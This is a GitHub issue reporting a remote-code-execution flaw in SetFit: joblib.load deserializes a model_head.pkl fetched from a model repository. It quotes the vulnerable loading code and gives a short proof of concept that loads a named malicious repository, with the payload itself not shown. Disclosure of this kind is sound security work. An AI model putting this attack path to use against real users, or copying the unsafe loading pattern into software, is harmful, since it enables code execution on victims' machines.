Skip to content

Unsafe deserialization via joblib.load("model_head.pkl") leads to remote code execution #630

@Vancir

Description

@Vancir

Description

SetFit loads model_head.pkl from a model repository using joblib.load(...). This is unsafe because joblib.load deserializes arbitrary Python objects and can execute attacker-controlled code during loading. As a result, if an attacker publishes a malicious SetFit model repository containing a crafted model_head.pkl, any user who loads that repository with SetFitModel.from_pretrained(...) can suffer arbitrary code execution on their machine.

This issue is especially dangerous because it is triggered during a normal model-loading workflow. A user may believe they are simply loading a remote model, but the deserialization of model_head.pkl silently executes code before the model is fully initialized. The trust_remote_code=False option does not help here, because the attack does not rely on Hugging Face remote code loading; it relies on unsafe pickle-based deserialization.

Root Cause

The vulnerable code directly loads model_head.pkl with joblib.load(...):

if model_head_file is not None:
model_head = joblib.load(model_head_file)
if isinstance(model_head, torch.nn.Module):
model_head.to(device)

The problem is that joblib.load uses Python pickle semantics under the hood. Loading a malicious pickle file can execute arbitrary code embedded by the attacker. Since model_head.pkl is fetched from the remote model repository and then deserialized without validation, a malicious repository can turn model loading into code execution.

Proof of Concept

An attacker can publish a malicious SetFit model repository such as XManFromXlab/setfit-ModelHead-RCE and place a crafted model_head.pkl inside it. The pickle payload can execute arbitrary Python code when deserialized.

A victim only needs to run the normal SetFit loading code:

from setfit import SetFitModel

model_id = "XManFromXlab/setfit-ModelHead-RCE"
model = SetFitModel.from_pretrained(model_id, trust_remote_code=False)

During from_pretrained(...), SetFit downloads model_head.pkl and calls joblib.load(model_head_file). At that moment, the malicious pickle payload executes on the victim host, leading to arbitrary code execution.

The key point is that this works even when trust_remote_code=False, because the exploit does not depend on custom remote Python modules. It abuses unsafe deserialization of a model artifact.

In this example, it will print the warning mesages.

$ python3 test.py

!!! Execute Malicious Payload !!!

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type
    No fields configured for issues without a type.

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions